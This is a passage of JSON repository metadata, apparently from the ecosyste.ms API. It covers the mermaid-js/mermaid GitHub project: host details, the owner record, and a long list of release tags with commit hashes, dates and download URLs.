vulnerabilities.","url":"https://github.com/ossf/scorecard/blob/cd152cb6742c5b8f2f3d2b5193b41d9c50905198/docs/checks.md#vulnerabilities"}}]},"last_synced_at":"2025-08-18T09:31:17.427Z","repository_id":37269779,"created_at":"2025-08-18T09:31:17.427Z","updated_at":"2025-08-18T09:31:17.427Z"},"host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":273137429,"owners_count":25052011,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","status":"online","status_checked_at":"2025-09-01T02:00:09.058Z","response_time":120,"last_error":null,"robots_txt_status":"success","robots_txt_updated_at":"2025-07-24T06:49:26.215Z","robots_txt_url":"https://github.com/robots.txt","online":true,"can_crawl_api":true,"host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"},"owner_record":{"login":"mermaid-js","name":"mermaid-js","uuid":"57169982","kind":"organization","description":"","email":null,"website":null,"location":null,"twitter":"mermaidjs_","company":null,"icon_url":"https://avatars.githubusercontent.com/u/57169982?v=4","repositories_count":11,"last_synced_at":"2023-04-08T11:47:59.066Z","metadata":{"has_sponsors_listing":false},"html_url":"https://github.com/mermaid-js","funding_links":[],"total_stars":null,"followers":null,"following":null,"created_at":"2022-11-14T05:34:15.747Z","updated_at":"2023-04-08T11:47:59.094Z","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/mermaid-js","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/mermaid-js/repositories"},"tags":[{"name":"mermaid@11.10.1","sha":"af3bbdc5919e5b7d4678946a78c2034885f794ad","kind":"tag","published_at":"2025-08-22T12:08:19.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/mermaid@11.10.1","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/mermaid@11.10.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@mermaid%4011.10.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/mermaid@11.10.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/mermaid@11.10.1/manifests"},{"name":"@mermaid-js/tiny@11.10.1","sha":"af3bbdc5919e5b7d4678946a78c2034885f794ad","kind":"tag","published_at":"2025-08-22T12:08:19.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/@mermaid-js/tiny@11.10.1","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/@mermaid-js/tiny@11.10.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@%40mermaid-js%2Ftiny%4011.10.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Ftiny@11.10.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Ftiny@11.10.1/manifests"},{"name":"v10.9.4","sha":"80dcf2eaad5b484ea41b5e0a8aee3fa8c5b99d34","kind":"commit","published_at":"2025-08-19T08:40:15.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/v10.9.4","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/v10.9.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@v10.9.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.9.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.9.4/manifests"},{"name":"mermaid@11.10.0","sha":"96778f77898c02489ba0d33c874eca4370e21205","kind":"tag","published_at":"2025-08-19T08:05:08.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/mermaid@11.10.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/mermaid@11.10.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@mermaid%4011.10.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/mermaid@11.10.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/mermaid@11.10.0/manifests"},{"name":"@mermaid-js/layout-elk@0.1.9","sha":"96778f77898c02489ba0d33c874eca4370e21205","kind":"tag","published_at":"2025-08-19T08:05:08.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/@mermaid-js/layout-elk@0.1.9","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/@mermaid-js/layout-elk@0.1.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@%40mermaid-js%2Flayout-elk%400.1.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Flayout-elk@0.1.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Flayout-elk@0.1.9/manifests"},{"name":"@mermaid-js/tiny@11.10.0","sha":"96778f77898c02489ba0d33c874eca4370e21205","kind":"tag","published_at":"2025-08-19T08:05:08.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/@mermaid-js/tiny@11.10.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/@mermaid-js/tiny@11.10.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@%40mermaid-js%2Ftiny%4011.10.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Ftiny@11.10.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Ftiny@11.10.0/manifests"},{"name":"@mermaid-js/mermaid-zenuml@0.2.2","sha":"96778f77898c02489ba0d33c874eca4370e21205","kind":"tag","published_at":"2025-08-19T08:05:08.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/@mermaid-js/mermaid-zenuml@0.2.2","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/@mermaid-js/mermaid-zenuml@0.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@%40mermaid-js%2Fmermaid-zenuml%400.2.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Fmermaid-zenuml@0.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Fmermaid-zenuml@0.2.2/manifests"},{"name":"mermaid@11.9.0","sha":"767754f4fbfe22e74e0612c5d684e9b58c3c5caf","kind":"commit","published_at":"2025-07-16T08:25:22.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/mermaid@11.9.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/mermaid@11.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@mermaid%4011.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/mermaid@11.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/mermaid@11.9.0/manifests"},{"name":"@mermaid-js/tiny@11.8.1","sha":"1aa28702245f9c874dc7b24ba20cb24d29a8bc17","kind":"tag","published_at":"2025-07-07T15:24:00.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/@mermaid-js/tiny@11.8.1","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/@mermaid-js/tiny@11.8.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@%40mermaid-js%2Ftiny%4011.8.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Ftiny@11.8.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Ftiny@11.8.1/manifests"},{"name":"@mermaid-js/parser@0.6.1","sha":"1aa28702245f9c874dc7b24ba20cb24d29a8bc17","kind":"tag","published_at":"2025-07-07T15:24:00.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/@mermaid-js/parser@0.6.1","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/@mermaid-js/parser@0.6.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@%40mermaid-js%2Fparser%400.6.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Fparser@0.6.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Fparser@0.6.1/manifests"},{"name":"mermaid@11.8.1","sha":"1aa28702245f9c874dc7b24ba20cb24d29a8bc17","kind":"tag","published_at":"2025-07-07T15:24:00.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/mermaid@11.8.1","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/mermaid@11.8.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@mermaid%4011.8.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/mermaid@11.8.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/mermaid@11.8.1/manifests"},{"name":"@mermaid-js/tiny@11.8.0","sha":"2b3cb6a362b81dad47cdbe246c1be97831c3b30f","kind":"tag","published_at":"2025-07-03T13:52:52.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/@mermaid-js/tiny@11.8.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/@mermaid-js/tiny@11.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@%40mermaid-js%2Ftiny%4011.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Ftiny@11.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Ftiny@11.8.0/manifests"},{"name":"mermaid@11.8.0","sha":"2b3cb6a362b81dad47cdbe246c1be97831c3b30f","kind":"tag","published_at":"2025-07-03T13:52:52.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/mermaid@11.8.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/mermaid@11.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@mermaid%4011.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/mermaid@11.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/mermaid@11.8.0/manifests"},{"name":"@mermaid-js/parser@0.6.0","sha":"2b3cb6a362b81dad47cdbe246c1be97831c3b30f","kind":"tag","published_at":"2025-07-03T13:52:52.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/@mermaid-js/parser@0.6.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/@mermaid-js/parser@0.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@%40mermaid-js%2Fparser%400.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Fparser@0.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Fparser@0.6.0/manifests"},{"name":"@mermaid-js/parser@0.5.0","sha":"1f07a781e4d0d6ba196939a0ab1102698d749faf","kind":"tag","published_at":"2025-06-20T05:03:36.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/@mermaid-js/parser@0.5.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/@mermaid-js/parser@0.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@%40mermaid-js%2Fparser%400.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Fparser@0.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Fparser@0.5.0/manifests"},{"name":"@mermaid-js/layout-elk@0.1.8","sha":"1f07a781e4d0d6ba196939a0ab1102698d749faf","kind":"tag","published_at":"2025-06-20T05:03:36.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/@mermaid-js/layout-elk@0.1.8","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/@mermaid-js/layout-elk@0.1.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@%40mermaid-js%2Flayout-elk%400.1.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Flayout-elk@0.1.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Flayout-elk@0.1.8/manifests"},{"name":"mermaid@11.7.0","sha":"1f07a781e4d0d6ba196939a0ab1102698d749faf","kind":"tag","published_at":"2025-06-20T05:03:36.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/mermaid@11.7.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/mermaid@11.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@mermaid%4011.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/mermaid@11.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/mermaid@11.7.0/manifests"},{"name":"@mermaid-js/tiny@11.7.0","sha":"1f07a781e4d0d6ba196939a0ab1102698d749faf","kind":"tag","published_at":"2025-06-20T05:03:36.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/@mermaid-js/tiny@11.7.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/@mermaid-js/tiny@11.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@%40mermaid-js%2Ftiny%4011.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Ftiny@11.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Ftiny@11.7.0/manifests"},{"name":"@mermaid-js/mermaid-zenuml@0.2.1","sha":"1f07a781e4d0d6ba196939a0ab1102698d749faf","kind":"tag","published_at":"2025-06-20T05:03:36.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/@mermaid-js/mermaid-zenuml@0.2.1","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/@mermaid-js/mermaid-zenuml@0.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@%40mermaid-js%2Fmermaid-zenuml%400.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Fmermaid-zenuml@0.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Fmermaid-zenuml@0.2.1/manifests"},{"name":"@mermaid-js/parser@0.4.0","sha":"7b2083926dbe3b6280f42376a0d4195b2c72fb8e","kind":"tag","published_at":"2025-03-25T11:43:55.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/@mermaid-js/parser@0.4.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/@mermaid-js/parser@0.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@%40mermaid-js%2Fparser%400.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Fparser@0.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Fparser@0.4.0/manifests"},{"name":"mermaid@11.6.0","sha":"7b2083926dbe3b6280f42376a0d4195b2c72fb8e","kind":"tag","published_at":"2025-03-25T11:43:55.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/mermaid@11.6.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/mermaid@11.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@mermaid%4011.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/mermaid@11.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/mermaid@11.6.0/manifests"},{"name":"mermaid@11.5.0","sha":"41a737f6821df4cdeab75643984912b82c1dff7a","kind":"tag","published_at":"2025-03-13T10:34:06.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/mermaid@11.5.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/mermaid@11.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@mermaid%4011.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/mermaid@11.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/mermaid@11.5.0/manifests"},{"name":"@mermaid-js/layout-elk@0.1.7","sha":"becadf0a7de509b6cc81e99a04abfa6cba8e7bfd","kind":"tag","published_at":"2024-11-27T17:15:52.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/@mermaid-js/layout-elk@0.1.7","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/@mermaid-js/layout-elk@0.1.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@%40mermaid-js%2Flayout-elk%400.1.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Flayout-elk@0.1.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Flayout-elk@0.1.7/manifests"},{"name":"@mermaid-js/layout-elk@0.1.6","sha":"9868f3a4c3784e214d8b6c74277ca542774e7de9","kind":"tag","published_at":"2024-11-27T11:03:00.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/@mermaid-js/layout-elk@0.1.6","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/@mermaid-js/layout-elk@0.1.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@%40mermaid-js%2Flayout-elk%400.1.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Flayout-elk@0.1.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Flayout-elk@0.1.6/manifests"},{"name":"mermaid@11.4.1","sha":"9868f3a4c3784e214d8b6c74277ca542774e7de9","kind":"tag","published_at":"2024-11-27T11:03:00.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/mermaid@11.4.1","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/mermaid@11.4.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@mermaid%4011.4.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/mermaid@11.4.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/mermaid@11.4.1/manifests"},{"name":"mermaid@11.4.0","sha":"56f522ec50b5c746be5532686dd465a06215273d","kind":"tag","published_at":"2024-10-30T15:43:30.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/mermaid@11.4.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/mermaid@11.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@mermaid%4011.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/mermaid@11.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/mermaid@11.4.0/manifests"},{"name":"v10.9.3","sha":"85ec96a72d06d45cf5d2b88af6ef0aca2d16c187","kind":"commit","published_at":"2024-10-22T08:32:05.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/v10.9.3","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/v10.9.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@v10.9.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.9.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.9.3/manifests"},{"name":"@mermaid-js/layout-elk@0.1.5","sha":"be574845730b1d9f173c7ddb5fb88a3944949672","kind":"tag","published_at":"2024-10-03T14:43:24.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/@mermaid-js/layout-elk@0.1.5","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/@mermaid-js/layout-elk@0.1.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@%40mermaid-js%2Flayout-elk%400.1.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Flayout-elk@0.1.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Flayout-elk@0.1.5/manifests"},{"name":"mermaid@11.3.0","sha":"be574845730b1d9f173c7ddb5fb88a3944949672","kind":"tag","published_at":"2024-10-03T14:43:24.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/mermaid@11.3.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/mermaid@11.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@mermaid%4011.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/mermaid@11.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/mermaid@11.3.0/manifests"},{"name":"v10.9.2","sha":"4dd4997c4d73784a239bac04deded9ff6866d2b4","kind":"commit","published_at":"2024-10-02T09:31:48.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/v10.9.2","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/v10.9.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@v10.9.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.9.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.9.2/manifests"},{"name":"mermaid@11.2.1","sha":"d63dc319c7c57a9900932fe4920be6a4e54570d5","kind":"tag","published_at":"2024-09-16T16:41:37.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/mermaid@11.2.1","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/mermaid@11.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@mermaid%4011.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/mermaid@11.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/mermaid@11.2.1/manifests"},{"name":"@mermaid-js/layout-elk@0.1.4","sha":"9c41708d9e439f4cf82c0c954e6c40217f6754e4","kind":"tag","published_at":"2024-09-09T14:03:06.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/@mermaid-js/layout-elk@0.1.4","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/@mermaid-js/layout-elk@0.1.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@%40mermaid-js%2Flayout-elk%400.1.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Flayout-elk@0.1.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Flayout-elk@0.1.4/manifests"},{"name":"mermaid@11.2.0","sha":"80903ec281db9053486f7dbfeae8430d2618e54d","kind":"tag","published_at":"2024-09-09T13:23:06.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/mermaid@11.2.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/mermaid@11.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@mermaid%4011.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/mermaid@11.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/mermaid@11.2.0/manifests"},{"name":"mermaid@11.1.1","sha":"73147196b11e38bf825df17ca5f319aa54748b90","kind":"tag","published_at":"2024-09-06T17:19:57.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/mermaid@11.1.1","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/mermaid@11.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@mermaid%4011.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/mermaid@11.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/mermaid@11.1.1/manifests"},{"name":"mermaid@11.1.0","sha":"32710c1d995db394ff8cd65c280dbb0a3026630f","kind":"tag","published_at":"2024-09-02T15:18:41.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/mermaid@11.1.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/mermaid@11.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@mermaid%4011.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/mermaid@11.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/mermaid@11.1.0/manifests"},{"name":"@mermaid-js/layout-elk@0.1.3","sha":"32710c1d995db394ff8cd65c280dbb0a3026630f","kind":"tag","published_at":"2024-09-02T15:18:41.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/@mermaid-js/layout-elk@0.1.3","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/@mermaid-js/layout-elk@0.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@%40mermaid-js%2Flayout-elk%400.1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Flayout-elk@0.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Flayout-elk@0.1.3/manifests"},{"name":"@mermaid-js/parser@0.3.0","sha":"32710c1d995db394ff8cd65c280dbb0a3026630f","kind":"tag","published_at":"2024-09-02T15:18:41.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/@mermaid-js/parser@0.3.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/@mermaid-js/parser@0.3.0","dependencies_parsed_at":null,"dependency_job